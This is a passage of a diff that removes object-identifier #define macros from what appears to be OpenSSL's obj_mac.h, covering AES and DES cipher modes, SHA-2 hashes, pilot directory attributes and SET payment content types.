-#define SN_aes_128_cfb128		"AES-128-CFB"
-#define LN_aes_128_cfb128		"aes-128-cfb"
-#define NID_aes_128_cfb128		421
-#define OBJ_aes_128_cfb128		OBJ_aes,4L
-
-#define SN_id_aes128_wrap		"id-aes128-wrap"
-#define NID_id_aes128_wrap		788
-#define OBJ_id_aes128_wrap		OBJ_aes,5L
-
-#define SN_aes_128_gcm		"id-aes128-GCM"
-#define LN_aes_128_gcm		"aes-128-gcm"
-#define NID_aes_128_gcm		895
-#define OBJ_aes_128_gcm		OBJ_aes,6L
-
-#define SN_aes_128_ccm		"id-aes128-CCM"
-#define LN_aes_128_ccm		"aes-128-ccm"
-#define NID_aes_128_ccm		896
-#define OBJ_aes_128_ccm		OBJ_aes,7L
-
-#define SN_id_aes128_wrap_pad		"id-aes128-wrap-pad"
-#define NID_id_aes128_wrap_pad		897
-#define OBJ_id_aes128_wrap_pad		OBJ_aes,8L
-
-#define SN_aes_192_ecb		"AES-192-ECB"
-#define LN_aes_192_ecb		"aes-192-ecb"
-#define NID_aes_192_ecb		422
-#define OBJ_aes_192_ecb		OBJ_aes,21L
-
-#define SN_aes_192_cbc		"AES-192-CBC"
-#define LN_aes_192_cbc		"aes-192-cbc"
-#define NID_aes_192_cbc		423
-#define OBJ_aes_192_cbc		OBJ_aes,22L
-
-#define SN_aes_192_ofb128		"AES-192-OFB"
-#define LN_aes_192_ofb128		"aes-192-ofb"
-#define NID_aes_192_ofb128		424
-#define OBJ_aes_192_ofb128		OBJ_aes,23L
-
-#define SN_aes_192_cfb128		"AES-192-CFB"
-#define LN_aes_192_cfb128		"aes-192-cfb"
-#define NID_aes_192_cfb128		425
-#define OBJ_aes_192_cfb128		OBJ_aes,24L
-
-#define SN_id_aes192_wrap		"id-aes192-wrap"
-#define NID_id_aes192_wrap		789
-#define OBJ_id_aes192_wrap		OBJ_aes,25L
-
-#define SN_aes_192_gcm		"id-aes192-GCM"
-#define LN_aes_192_gcm		"aes-192-gcm"
-#define NID_aes_192_gcm		898
-#define OBJ_aes_192_gcm		OBJ_aes,26L
-
-#define SN_aes_192_ccm		"id-aes192-CCM"
-#define LN_aes_192_ccm		"aes-192-ccm"
-#define NID_aes_192_ccm		899
-#define OBJ_aes_192_ccm		OBJ_aes,27L
-
-#define SN_id_aes192_wrap_pad		"id-aes192-wrap-pad"
-#define NID_id_aes192_wrap_pad		900
-#define OBJ_id_aes192_wrap_pad		OBJ_aes,28L
-
-#define SN_aes_256_ecb		"AES-256-ECB"
-#define LN_aes_256_ecb		"aes-256-ecb"
-#define NID_aes_256_ecb		426
-#define OBJ_aes_256_ecb		OBJ_aes,41L
-
-#define SN_aes_256_cbc		"AES-256-CBC"
-#define LN_aes_256_cbc		"aes-256-cbc"
-#define NID_aes_256_cbc		427
-#define OBJ_aes_256_cbc		OBJ_aes,42L
-
-#define SN_aes_256_ofb128		"AES-256-OFB"
-#define LN_aes_256_ofb128		"aes-256-ofb"
-#define NID_aes_256_ofb128		428
-#define OBJ_aes_256_ofb128		OBJ_aes,43L
-
-#define SN_aes_256_cfb128		"AES-256-CFB"
-#define LN_aes_256_cfb128		"aes-256-cfb"
-#define NID_aes_256_cfb128		429
-#define OBJ_aes_256_cfb128		OBJ_aes,44L
-
-#define SN_id_aes256_wrap		"id-aes256-wrap"
-#define NID_id_aes256_wrap		790
-#define OBJ_id_aes256_wrap		OBJ_aes,45L
-
-#define SN_aes_256_gcm		"id-aes256-GCM"
-#define LN_aes_256_gcm		"aes-256-gcm"
-#define NID_aes_256_gcm		901
-#define OBJ_aes_256_gcm		OBJ_aes,46L
-
-#define SN_aes_256_ccm		"id-aes256-CCM"
-#define LN_aes_256_ccm		"aes-256-ccm"
-#define NID_aes_256_ccm		902
-#define OBJ_aes_256_ccm		OBJ_aes,47L
-
-#define SN_id_aes256_wrap_pad		"id-aes256-wrap-pad"
-#define NID_id_aes256_wrap_pad		903
-#define OBJ_id_aes256_wrap_pad		OBJ_aes,48L
-
-#define SN_aes_128_cfb1		"AES-128-CFB1"
-#define LN_aes_128_cfb1		"aes-128-cfb1"
-#define NID_aes_128_cfb1		650
-
-#define SN_aes_192_cfb1		"AES-192-CFB1"
-#define LN_aes_192_cfb1		"aes-192-cfb1"
-#define NID_aes_192_cfb1		651
-
-#define SN_aes_256_cfb1		"AES-256-CFB1"
-#define LN_aes_256_cfb1		"aes-256-cfb1"
-#define NID_aes_256_cfb1		652
-
-#define SN_aes_128_cfb8		"AES-128-CFB8"
-#define LN_aes_128_cfb8		"aes-128-cfb8"
-#define NID_aes_128_cfb8		653
-
-#define SN_aes_192_cfb8		"AES-192-CFB8"
-#define LN_aes_192_cfb8		"aes-192-cfb8"
-#define NID_aes_192_cfb8		654
-
-#define SN_aes_256_cfb8		"AES-256-CFB8"
-#define LN_aes_256_cfb8		"aes-256-cfb8"
-#define NID_aes_256_cfb8		655
-
-#define SN_aes_128_ctr		"AES-128-CTR"
-#define LN_aes_128_ctr		"aes-128-ctr"
-#define NID_aes_128_ctr		904
-
-#define SN_aes_192_ctr		"AES-192-CTR"
-#define LN_aes_192_ctr		"aes-192-ctr"
-#define NID_aes_192_ctr		905
-
-#define SN_aes_256_ctr		"AES-256-CTR"
-#define LN_aes_256_ctr		"aes-256-ctr"
-#define NID_aes_256_ctr		906
-
-#define SN_aes_128_xts		"AES-128-XTS"
-#define LN_aes_128_xts		"aes-128-xts"
-#define NID_aes_128_xts		913
-
-#define SN_aes_256_xts		"AES-256-XTS"
-#define LN_aes_256_xts		"aes-256-xts"
-#define NID_aes_256_xts		914
-
-#define SN_des_cfb1		"DES-CFB1"
-#define LN_des_cfb1		"des-cfb1"
-#define NID_des_cfb1		656
-
-#define SN_des_cfb8		"DES-CFB8"
-#define LN_des_cfb8		"des-cfb8"
-#define NID_des_cfb8		657
-
-#define SN_des_ede3_cfb1		"DES-EDE3-CFB1"
-#define LN_des_ede3_cfb1		"des-ede3-cfb1"
-#define NID_des_ede3_cfb1		658
-
-#define SN_des_ede3_cfb8		"DES-EDE3-CFB8"
-#define LN_des_ede3_cfb8		"des-ede3-cfb8"
-#define NID_des_ede3_cfb8		659
-
-#define OBJ_nist_hashalgs		OBJ_nistAlgorithms,2L
-
-#define SN_sha256		"SHA256"
-#define LN_sha256		"sha256"
-#define NID_sha256		672
-#define OBJ_sha256		OBJ_nist_hashalgs,1L
-
-#define SN_sha384		"SHA384"
-#define LN_sha384		"sha384"
-#define NID_sha384		673
-#define OBJ_sha384		OBJ_nist_hashalgs,2L
-
-#define SN_sha512		"SHA512"
-#define LN_sha512		"sha512"
-#define NID_sha512		674
-#define OBJ_sha512		OBJ_nist_hashalgs,3L
-
-#define SN_sha224		"SHA224"
-#define LN_sha224		"sha224"
-#define NID_sha224		675
-#define OBJ_sha224		OBJ_nist_hashalgs,4L
-
-#define OBJ_dsa_with_sha2		OBJ_nistAlgorithms,3L
-
-#define SN_dsa_with_SHA224		"dsa_with_SHA224"
-#define NID_dsa_with_SHA224		802
-#define OBJ_dsa_with_SHA224		OBJ_dsa_with_sha2,1L
-
-#define SN_dsa_with_SHA256		"dsa_with_SHA256"
-#define NID_dsa_with_SHA256		803
-#define OBJ_dsa_with_SHA256		OBJ_dsa_with_sha2,2L
-
-#define SN_hold_instruction_code		"holdInstructionCode"
-#define LN_hold_instruction_code		"Hold Instruction Code"
-#define NID_hold_instruction_code		430
-#define OBJ_hold_instruction_code		OBJ_id_ce,23L
-
-#define OBJ_holdInstruction		OBJ_X9_57,2L
-
-#define SN_hold_instruction_none		"holdInstructionNone"
-#define LN_hold_instruction_none		"Hold Instruction None"
-#define NID_hold_instruction_none		431
-#define OBJ_hold_instruction_none		OBJ_holdInstruction,1L
-
-#define SN_hold_instruction_call_issuer		"holdInstructionCallIssuer"
-#define LN_hold_instruction_call_issuer		"Hold Instruction Call Issuer"
-#define NID_hold_instruction_call_issuer		432
-#define OBJ_hold_instruction_call_issuer		OBJ_holdInstruction,2L
-
-#define SN_hold_instruction_reject		"holdInstructionReject"
-#define LN_hold_instruction_reject		"Hold Instruction Reject"
-#define NID_hold_instruction_reject		433
-#define OBJ_hold_instruction_reject		OBJ_holdInstruction,3L
-
-#define SN_data		"data"
-#define NID_data		434
-#define OBJ_data		OBJ_itu_t,9L
-
-#define SN_pss		"pss"
-#define NID_pss		435
-#define OBJ_pss		OBJ_data,2342L
-
-#define SN_ucl		"ucl"
-#define NID_ucl		436
-#define OBJ_ucl		OBJ_pss,19200300L
-
-#define SN_pilot		"pilot"
-#define NID_pilot		437
-#define OBJ_pilot		OBJ_ucl,100L
-
-#define LN_pilotAttributeType		"pilotAttributeType"
-#define NID_pilotAttributeType		438
-#define OBJ_pilotAttributeType		OBJ_pilot,1L
-
-#define LN_pilotAttributeSyntax		"pilotAttributeSyntax"
-#define NID_pilotAttributeSyntax		439
-#define OBJ_pilotAttributeSyntax		OBJ_pilot,3L
-
-#define LN_pilotObjectClass		"pilotObjectClass"
-#define NID_pilotObjectClass		440
-#define OBJ_pilotObjectClass		OBJ_pilot,4L
-
-#define LN_pilotGroups		"pilotGroups"
-#define NID_pilotGroups		441
-#define OBJ_pilotGroups		OBJ_pilot,10L
-
-#define LN_iA5StringSyntax		"iA5StringSyntax"
-#define NID_iA5StringSyntax		442
-#define OBJ_iA5StringSyntax		OBJ_pilotAttributeSyntax,4L
-
-#define LN_caseIgnoreIA5StringSyntax		"caseIgnoreIA5StringSyntax"
-#define NID_caseIgnoreIA5StringSyntax		443
-#define OBJ_caseIgnoreIA5StringSyntax		OBJ_pilotAttributeSyntax,5L
-
-#define LN_pilotObject		"pilotObject"
-#define NID_pilotObject		444
-#define OBJ_pilotObject		OBJ_pilotObjectClass,3L
-
-#define LN_pilotPerson		"pilotPerson"
-#define NID_pilotPerson		445
-#define OBJ_pilotPerson		OBJ_pilotObjectClass,4L
-
-#define SN_account		"account"
-#define NID_account		446
-#define OBJ_account		OBJ_pilotObjectClass,5L
-
-#define SN_document		"document"
-#define NID_document		447
-#define OBJ_document		OBJ_pilotObjectClass,6L
-
-#define SN_room		"room"
-#define NID_room		448
-#define OBJ_room		OBJ_pilotObjectClass,7L
-
-#define LN_documentSeries		"documentSeries"
-#define NID_documentSeries		449
-#define OBJ_documentSeries		OBJ_pilotObjectClass,9L
-
-#define SN_Domain		"domain"
-#define LN_Domain		"Domain"
-#define NID_Domain		392
-#define OBJ_Domain		OBJ_pilotObjectClass,13L
-
-#define LN_rFC822localPart		"rFC822localPart"
-#define NID_rFC822localPart		450
-#define OBJ_rFC822localPart		OBJ_pilotObjectClass,14L
-
-#define LN_dNSDomain		"dNSDomain"
-#define NID_dNSDomain		451
-#define OBJ_dNSDomain		OBJ_pilotObjectClass,15L
-
-#define LN_domainRelatedObject		"domainRelatedObject"
-#define NID_domainRelatedObject		452
-#define OBJ_domainRelatedObject		OBJ_pilotObjectClass,17L
-
-#define LN_friendlyCountry		"friendlyCountry"
-#define NID_friendlyCountry		453
-#define OBJ_friendlyCountry		OBJ_pilotObjectClass,18L
-
-#define LN_simpleSecurityObject		"simpleSecurityObject"
-#define NID_simpleSecurityObject		454
-#define OBJ_simpleSecurityObject		OBJ_pilotObjectClass,19L
-
-#define LN_pilotOrganization		"pilotOrganization"
-#define NID_pilotOrganization		455
-#define OBJ_pilotOrganization		OBJ_pilotObjectClass,20L
-
-#define LN_pilotDSA		"pilotDSA"
-#define NID_pilotDSA		456
-#define OBJ_pilotDSA		OBJ_pilotObjectClass,21L
-
-#define LN_qualityLabelledData		"qualityLabelledData"
-#define NID_qualityLabelledData		457
-#define OBJ_qualityLabelledData		OBJ_pilotObjectClass,22L
-
-#define SN_userId		"UID"
-#define LN_userId		"userId"
-#define NID_userId		458
-#define OBJ_userId		OBJ_pilotAttributeType,1L
-
-#define LN_textEncodedORAddress		"textEncodedORAddress"
-#define NID_textEncodedORAddress		459
-#define OBJ_textEncodedORAddress		OBJ_pilotAttributeType,2L
-
-#define SN_rfc822Mailbox		"mail"
-#define LN_rfc822Mailbox		"rfc822Mailbox"
-#define NID_rfc822Mailbox		460
-#define OBJ_rfc822Mailbox		OBJ_pilotAttributeType,3L
-
-#define SN_info		"info"
-#define NID_info		461
-#define OBJ_info		OBJ_pilotAttributeType,4L
-
-#define LN_favouriteDrink		"favouriteDrink"
-#define NID_favouriteDrink		462
-#define OBJ_favouriteDrink		OBJ_pilotAttributeType,5L
-
-#define LN_roomNumber		"roomNumber"
-#define NID_roomNumber		463
-#define OBJ_roomNumber		OBJ_pilotAttributeType,6L
-
-#define SN_photo		"photo"
-#define NID_photo		464
-#define OBJ_photo		OBJ_pilotAttributeType,7L
-
-#define LN_userClass		"userClass"
-#define NID_userClass		465
-#define OBJ_userClass		OBJ_pilotAttributeType,8L
-
-#define SN_host		"host"
-#define NID_host		466
-#define OBJ_host		OBJ_pilotAttributeType,9L
-
-#define SN_manager		"manager"
-#define NID_manager		467
-#define OBJ_manager		OBJ_pilotAttributeType,10L
-
-#define LN_documentIdentifier		"documentIdentifier"
-#define NID_documentIdentifier		468
-#define OBJ_documentIdentifier		OBJ_pilotAttributeType,11L
-
-#define LN_documentTitle		"documentTitle"
-#define NID_documentTitle		469
-#define OBJ_documentTitle		OBJ_pilotAttributeType,12L
-
-#define LN_documentVersion		"documentVersion"
-#define NID_documentVersion		470
-#define OBJ_documentVersion		OBJ_pilotAttributeType,13L
-
-#define LN_documentAuthor		"documentAuthor"
-#define NID_documentAuthor		471
-#define OBJ_documentAuthor		OBJ_pilotAttributeType,14L
-
-#define LN_documentLocation		"documentLocation"
-#define NID_documentLocation		472
-#define OBJ_documentLocation		OBJ_pilotAttributeType,15L
-
-#define LN_homeTelephoneNumber		"homeTelephoneNumber"
-#define NID_homeTelephoneNumber		473
-#define OBJ_homeTelephoneNumber		OBJ_pilotAttributeType,20L
-
-#define SN_secretary		"secretary"
-#define NID_secretary		474
-#define OBJ_secretary		OBJ_pilotAttributeType,21L
-
-#define LN_otherMailbox		"otherMailbox"
-#define NID_otherMailbox		475
-#define OBJ_otherMailbox		OBJ_pilotAttributeType,22L
-
-#define LN_lastModifiedTime		"lastModifiedTime"
-#define NID_lastModifiedTime		476
-#define OBJ_lastModifiedTime		OBJ_pilotAttributeType,23L
-
-#define LN_lastModifiedBy		"lastModifiedBy"
-#define NID_lastModifiedBy		477
-#define OBJ_lastModifiedBy		OBJ_pilotAttributeType,24L
-
-#define SN_domainComponent		"DC"
-#define LN_domainComponent		"domainComponent"
-#define NID_domainComponent		391
-#define OBJ_domainComponent		OBJ_pilotAttributeType,25L
-
-#define LN_aRecord		"aRecord"
-#define NID_aRecord		478
-#define OBJ_aRecord		OBJ_pilotAttributeType,26L
-
-#define LN_pilotAttributeType27		"pilotAttributeType27"
-#define NID_pilotAttributeType27		479
-#define OBJ_pilotAttributeType27		OBJ_pilotAttributeType,27L
-
-#define LN_mXRecord		"mXRecord"
-#define NID_mXRecord		480
-#define OBJ_mXRecord		OBJ_pilotAttributeType,28L
-
-#define LN_nSRecord		"nSRecord"
-#define NID_nSRecord		481
-#define OBJ_nSRecord		OBJ_pilotAttributeType,29L
-
-#define LN_sOARecord		"sOARecord"
-#define NID_sOARecord		482
-#define OBJ_sOARecord		OBJ_pilotAttributeType,30L
-
-#define LN_cNAMERecord		"cNAMERecord"
-#define NID_cNAMERecord		483
-#define OBJ_cNAMERecord		OBJ_pilotAttributeType,31L
-
-#define LN_associatedDomain		"associatedDomain"
-#define NID_associatedDomain		484
-#define OBJ_associatedDomain		OBJ_pilotAttributeType,37L
-
-#define LN_associatedName		"associatedName"
-#define NID_associatedName		485
-#define OBJ_associatedName		OBJ_pilotAttributeType,38L
-
-#define LN_homePostalAddress		"homePostalAddress"
-#define NID_homePostalAddress		486
-#define OBJ_homePostalAddress		OBJ_pilotAttributeType,39L
-
-#define LN_personalTitle		"personalTitle"
-#define NID_personalTitle		487
-#define OBJ_personalTitle		OBJ_pilotAttributeType,40L
-
-#define LN_mobileTelephoneNumber		"mobileTelephoneNumber"
-#define NID_mobileTelephoneNumber		488
-#define OBJ_mobileTelephoneNumber		OBJ_pilotAttributeType,41L
-
-#define LN_pagerTelephoneNumber		"pagerTelephoneNumber"
-#define NID_pagerTelephoneNumber		489
-#define OBJ_pagerTelephoneNumber		OBJ_pilotAttributeType,42L
-
-#define LN_friendlyCountryName		"friendlyCountryName"
-#define NID_friendlyCountryName		490
-#define OBJ_friendlyCountryName		OBJ_pilotAttributeType,43L
-
-#define LN_organizationalStatus		"organizationalStatus"
-#define NID_organizationalStatus		491
-#define OBJ_organizationalStatus		OBJ_pilotAttributeType,45L
-
-#define LN_janetMailbox		"janetMailbox"
-#define NID_janetMailbox		492
-#define OBJ_janetMailbox		OBJ_pilotAttributeType,46L
-
-#define LN_mailPreferenceOption		"mailPreferenceOption"
-#define NID_mailPreferenceOption		493
-#define OBJ_mailPreferenceOption		OBJ_pilotAttributeType,47L
-
-#define LN_buildingName		"buildingName"
-#define NID_buildingName		494
-#define OBJ_buildingName		OBJ_pilotAttributeType,48L
-
-#define LN_dSAQuality		"dSAQuality"
-#define NID_dSAQuality		495
-#define OBJ_dSAQuality		OBJ_pilotAttributeType,49L
-
-#define LN_singleLevelQuality		"singleLevelQuality"
-#define NID_singleLevelQuality		496
-#define OBJ_singleLevelQuality		OBJ_pilotAttributeType,50L
-
-#define LN_subtreeMinimumQuality		"subtreeMinimumQuality"
-#define NID_subtreeMinimumQuality		497
-#define OBJ_subtreeMinimumQuality		OBJ_pilotAttributeType,51L
-
-#define LN_subtreeMaximumQuality		"subtreeMaximumQuality"
-#define NID_subtreeMaximumQuality		498
-#define OBJ_subtreeMaximumQuality		OBJ_pilotAttributeType,52L
-
-#define LN_personalSignature		"personalSignature"
-#define NID_personalSignature		499
-#define OBJ_personalSignature		OBJ_pilotAttributeType,53L
-
-#define LN_dITRedirect		"dITRedirect"
-#define NID_dITRedirect		500
-#define OBJ_dITRedirect		OBJ_pilotAttributeType,54L
-
-#define SN_audio		"audio"
-#define NID_audio		501
-#define OBJ_audio		OBJ_pilotAttributeType,55L
-
-#define LN_documentPublisher		"documentPublisher"
-#define NID_documentPublisher		502
-#define OBJ_documentPublisher		OBJ_pilotAttributeType,56L
-
-#define SN_id_set		"id-set"
-#define LN_id_set		"Secure Electronic Transactions"
-#define NID_id_set		512
-#define OBJ_id_set		OBJ_international_organizations,42L
-
-#define SN_set_ctype		"set-ctype"
-#define LN_set_ctype		"content types"
-#define NID_set_ctype		513
-#define OBJ_set_ctype		OBJ_id_set,0L
-
-#define SN_set_msgExt		"set-msgExt"
-#define LN_set_msgExt		"message extensions"
-#define NID_set_msgExt		514
-#define OBJ_set_msgExt		OBJ_id_set,1L
-
-#define SN_set_attr		"set-attr"
-#define NID_set_attr		515
-#define OBJ_set_attr		OBJ_id_set,3L
-
-#define SN_set_policy		"set-policy"
-#define NID_set_policy		516
-#define OBJ_set_policy		OBJ_id_set,5L
-
-#define SN_set_certExt		"set-certExt"
-#define LN_set_certExt		"certificate extensions"
-#define NID_set_certExt		517
-#define OBJ_set_certExt		OBJ_id_set,7L
-
-#define SN_set_brand		"set-brand"
-#define NID_set_brand		518
-#define OBJ_set_brand		OBJ_id_set,8L
-
-#define SN_setct_PANData		"setct-PANData"
-#define NID_setct_PANData		519
-#define OBJ_setct_PANData		OBJ_set_ctype,0L
-
-#define SN_setct_PANToken		"setct-PANToken"
-#define NID_setct_PANToken		520
-#define OBJ_setct_PANToken		OBJ_set_ctype,1L
-
-#define SN_setct_PANOnly		"setct-PANOnly"
-#define NID_setct_PANOnly		521
-#define OBJ_setct_PANOnly		OBJ_set_ctype,2L
-
-#define SN_setct_OIData		"setct-OIData"
-#define NID_setct_OIData		522
-#define OBJ_setct_OIData		OBJ_set_ctype,3L
-
-#define SN_setct_PI		"setct-PI"
-#define NID_setct_PI		523
-#define OBJ_setct_PI		OBJ_set_ctype,4L
-
-#define SN_setct_PIData		"setct-PIData"
-#define NID_setct_PIData		524
-#define OBJ_setct_PIData		OBJ_set_ctype,5L
-
-#define SN_setct_PIDataUnsigned		"setct-PIDataUnsigned"
-#define NID_setct_PIDataUnsigned		525
-#define OBJ_setct_PIDataUnsigned		OBJ_set_ctype,6L
-
-#define SN_setct_HODInput		"setct-HODInput"
-#define NID_setct_HODInput		526
-#define OBJ_setct_HODInput		OBJ_set_ctype,7L
-
-#define SN_setct_AuthResBaggage		"setct-AuthResBaggage"
-#define NID_setct_AuthResBaggage		527
-#define OBJ_setct_AuthResBaggage		OBJ_set_ctype,8L
-
-#define SN_setct_AuthRevReqBaggage		"setct-AuthRevReqBaggage"
-#define NID_setct_AuthRevReqBaggage		528
-#define OBJ_setct_AuthRevReqBaggage		OBJ_set_ctype,9L
-
-#define SN_setct_AuthRevResBaggage		"setct-AuthRevResBaggage"
-#define NID_setct_AuthRevResBaggage		529
-#define OBJ_setct_AuthRevResBaggage		OBJ_set_ctype,10L
-
-#define SN_setct_CapTokenSeq		"setct-CapTokenSeq"
-#define NID_setct_CapTokenSeq		530
-#define OBJ_setct_CapTokenSeq		OBJ_set_ctype,11L
-
-#define SN_setct_PInitResData		"setct-PInitResData"
-#define NID_setct_PInitResData		531
-#define OBJ_setct_PInitResData		OBJ_set_ctype,12L
-
-#define SN_setct_PI_TBS		"setct-PI-TBS"
-#define NID_setct_PI_TBS		532
-#define OBJ_setct_PI_TBS		OBJ_set_ctype,13L
-
-#define SN_setct_PResData		"setct-PResData"
-#define NID_setct_PResData		533
-#define OBJ_setct_PResData		OBJ_set_ctype,14L
-
-#define SN_setct_AuthReqTBS		"setct-AuthReqTBS"
-#define NID_setct_AuthReqTBS		534
-#define OBJ_setct_AuthReqTBS		OBJ_set_ctype,16L
-
-#define SN_setct_AuthResTBS		"setct-AuthResTBS"
-#define NID_setct_AuthResTBS		535
-#define OBJ_setct_AuthResTBS		OBJ_set_ctype,17L
-
-#define SN_setct_AuthResTBSX		"setct-AuthResTBSX"
-#define NID_setct_AuthResTBSX		536
-#define OBJ_setct_AuthResTBSX		OBJ_set_ctype,18L
-
-#define SN_setct_AuthTokenTBS		"setct-AuthTokenTBS"
-#define NID_setct_AuthTokenTBS		537
-#define OBJ_setct_AuthTokenTBS		OBJ_set_ctype,19L
-
-#define SN_setct_CapTokenData		"setct-CapTokenData"
-#define NID_setct_CapTokenData		538
-#define OBJ_setct_CapTokenData		OBJ_set_ctype,20L
-
-#define SN_setct_CapTokenTBS		"setct-CapTokenTBS"
-#define NID_setct_CapTokenTBS		539
-#define OBJ_setct_CapTokenTBS		OBJ_set_ctype,21L
-
-#define SN_setct_AcqCardCodeMsg		"setct-AcqCardCodeMsg"
-#define NID_setct_AcqCardCodeMsg		540
-#define OBJ_setct_AcqCardCodeMsg		OBJ_set_ctype,22L
-
-#define SN_setct_AuthRevReqTBS		"setct-AuthRevReqTBS"
-#define NID_setct_AuthRevReqTBS		541
-#define OBJ_setct_AuthRevReqTBS		OBJ_set_ctype,23L
-
-#define SN_setct_AuthRevResData		"setct-AuthRevResData"
-#define NID_setct_AuthRevResData		542
-#define OBJ_setct_AuthRevResData		OBJ_set_ctype,24L
-
-#define SN_setct_AuthRevResTBS		"setct-AuthRevResTBS"
-#define NID_setct_AuthRevResTBS		543
-#define OBJ_setct_AuthRevResTBS		OBJ_set_ctype,25L
-
-#define SN_setct_CapReqTBS		"setct-CapReqTBS"
-#define NID_setct_CapReqTBS		544
-#define OBJ_setct_CapReqTBS		OBJ_set_ctype,26L
-
-#define SN_setct_CapReqTBSX		"setct-CapReqTBSX"
-#define NID_setct_CapReqTBSX		545
-#define OBJ_setct_CapReqTBSX		OBJ_set_ctype,27L
-
-#define SN_setct_CapResData		"setct-CapResData"
-#define NID_setct_CapResData		546
-#define OBJ_setct_CapResData		OBJ_set_ctype,28L
-
-#define SN_setct_CapRevReqTBS		"setct-CapRevReqTBS"
-#define NID_setct_CapRevReqTBS		547
-#define OBJ_setct_CapRevReqTBS		OBJ_set_ctype,29L
-
-#define SN_setct_CapRevReqTBSX		"setct-CapRevReqTBSX"
-#define NID_setct_CapRevReqTBSX		548
-#define OBJ_setct_CapRevReqTBSX		OBJ_set_ctype,30L
-
-#define SN_setct_CapRevResData		"setct-CapRevResData"
-#define NID_setct_CapRevResData		549
-#define OBJ_setct_CapRevResData		OBJ_set_ctype,31L
-
-#define SN_setct_CredReqTBS		"setct-CredReqTBS"
-#define NID_setct_CredReqTBS		550
-#define OBJ_setct_CredReqTBS		OBJ_set_ctype,32L
-
-#define SN_setct_CredReqTBSX		"setct-CredReqTBSX"
-#define NID_setct_CredReqTBSX		551
-#define OBJ_setct_CredReqTBSX		OBJ_set_ctype,33L
-
-#define SN_setct_CredResData		"setct-CredResData"
-#define NID_setct_CredResData		552
-#define OBJ_setct_CredResData		OBJ_set_ctype,34L
-
-#define SN_setct_CredRevReqTBS		"setct-CredRevReqTBS"
-#define NID_setct_CredRevReqTBS		553
-#define OBJ_setct_CredRevReqTBS		OBJ_set_ctype,35L
-
-#define SN_setct_CredRevReqTBSX		"setct-CredRevReqTBSX"
-#define NID_setct_CredRevReqTBSX		554
-#define OBJ_setct_CredRevReqTBSX		OBJ_set_ctype,36L
-
-#define SN_setct_CredRevResData		"setct-CredRevResData"
-#define NID_setct_CredRevResData		555
-#define OBJ_setct_CredRevResData		OBJ_set_ctype,37L
-
-#define SN_setct_PCertReqData		"setct-PCertReqData"
-#define NID_setct_PCertReqData		556
-#define OBJ_setct_PCertReqData		OBJ_set_ctype,38L
-
-#define SN_setct_PCertResTBS		"setct-PCertResTBS"
-#define NID_setct_PCertResTBS		557
-#define OBJ_setct_PCertResTBS		OBJ_set_ctype,39L
-
-#define SN_setct_BatchAdminReqData		"setct-BatchAdminReqData"
-#define NID_setct_BatchAdminReqData		558
-#define OBJ_setct_BatchAdminReqData		OBJ_set_ctype,40L
-
-#define SN_setct_BatchAdminResData		"setct-BatchAdminResData"
-#define NID_setct_BatchAdminResData		559
-#define OBJ_setct_BatchAdminResData		OBJ_set_ctype,41L
-
-#define SN_setct_CardCInitResTBS		"setct-CardCInitResTBS"
-#define NID_setct_CardCInitResTBS		560
-#define OBJ_setct_CardCInitResTBS		OBJ_set_ctype,42L
-
-#define SN_setct_MeAqCInitResTBS		"setct-MeAqCInitResTBS"
-#define NID_setct_MeAqCInitResTBS		561
-#define OBJ_setct_MeAqCInitResTBS		OBJ_set_ctype,43L
-
-#define SN_setct_RegFormResTBS		"setct-RegFormResTBS"
-#define NID_setct_RegFormResTBS		562
-#define OBJ_setct_RegFormResTBS		OBJ_set_ctype,44L
-
-#define SN_setct_CertReqData		"setct-CertReqData"
-#define NID_setct_CertReqData		563
-#define OBJ_setct_CertReqData		OBJ_set_ctype,45L
-
-#define SN_setct_CertReqTBS		"setct-CertReqTBS"
-#define NID_setct_CertReqTBS		564
-#define OBJ_setct_CertReqTBS		OBJ_set_ctype,46L
-
-#define SN_setct_CertResData		"setct-CertResData"
-#define NID_setct_CertResData		565
-#define OBJ_setct_CertResData		OBJ_set_ctype,47L
-
-#define SN_setct_CertInqReqTBS		"setct-CertInqReqTBS"
-#define NID_setct_CertInqReqTBS		566
-#define OBJ_setct_CertInqReqTBS		OBJ_set_ctype,48L
-
-#define SN_setct_ErrorTBS		"setct-ErrorTBS"
-#define NID_setct_ErrorTBS		567
-#define OBJ_setct_ErrorTBS		OBJ_set_ctype,49L
-
-#define SN_setct_PIDualSignedTBE		"setct-PIDualSignedTBE"
-#define NID_setct_PIDualSignedTBE		568
-#define OBJ_setct_PIDualSignedTBE		OBJ_set_ctype,50L
-
-#define SN_setct_PIUnsignedTBE		"setct-PIUnsignedTBE"
-#define NID_setct_PIUnsignedTBE		569
-#define OBJ_setct_PIUnsignedTBE		OBJ_set_ctype,51L
-
-#define SN_setct_AuthReqTBE		"setct-AuthReqTBE"
-#define NID_setct_AuthReqTBE		570
-#define OBJ_setct_AuthReqTBE		OBJ_set_ctype,52L
-
-#define SN_setct_AuthResTBE		"setct-AuthResTBE"
-#define NID_setct_AuthResTBE		571
-#define OBJ_setct_AuthResTBE		OBJ_set_ctype,53L
-
-#define SN_setct_AuthResTBEX		"setct-AuthResTBEX"
-#define NID_setct_AuthResTBEX		572
-#define OBJ_setct_AuthResTBEX		OBJ_set_ctype,54L
-
-#define SN_setct_AuthTokenTBE		"setct-AuthTokenTBE"
-#define NID_setct_AuthTokenTBE		573
-#define OBJ_setct_AuthTokenTBE		OBJ_set_ctype,55L
-
-#define SN_setct_CapTokenTBE		"setct-CapTokenTBE"
-#define NID_setct_CapTokenTBE		574
-#define OBJ_setct_CapTokenTBE		OBJ_set_ctype,56L
-
-#define SN_setct_CapTokenTBEX		"setct-CapTokenTBEX"
-#define NID_setct_CapTokenTBEX		575
-#define OBJ_setct_CapTokenTBEX		OBJ_set_ctype,57L
-
-#define SN_setct_AcqCardCodeMsgTBE		"setct-AcqCardCodeMsgTBE"
-#define NID_setct_AcqCardCodeMsgTBE		576
-#define OBJ_setct_AcqCardCodeMsgTBE		OBJ_set_ctype,58L
-
-#define SN_setct_AuthRevReqTBE		"setct-AuthRevReqTBE"
-#define NID_setct_AuthRevReqTBE		577
-#define OBJ_setct_AuthRevReqTBE		OBJ_set_ctype,59L
-
-#define SN_setct_AuthRevResTBE		"setct-AuthRevResTBE"
-#define NID_setct_AuthRevResTBE		578
-#define OBJ_setct_AuthRevResTBE		OBJ_set_ctype,60L
-
-#define SN_setct_AuthRevResTBEB		"setct-AuthRevResTBEB"
-#define NID_setct_AuthRevResTBEB		579
-#define OBJ_setct_AuthRevResTBEB		OBJ_set_ctype,61L
-
-#define SN_setct_CapReqTBE		"setct-CapReqTBE"
-#define NID_setct_CapReqTBE		580
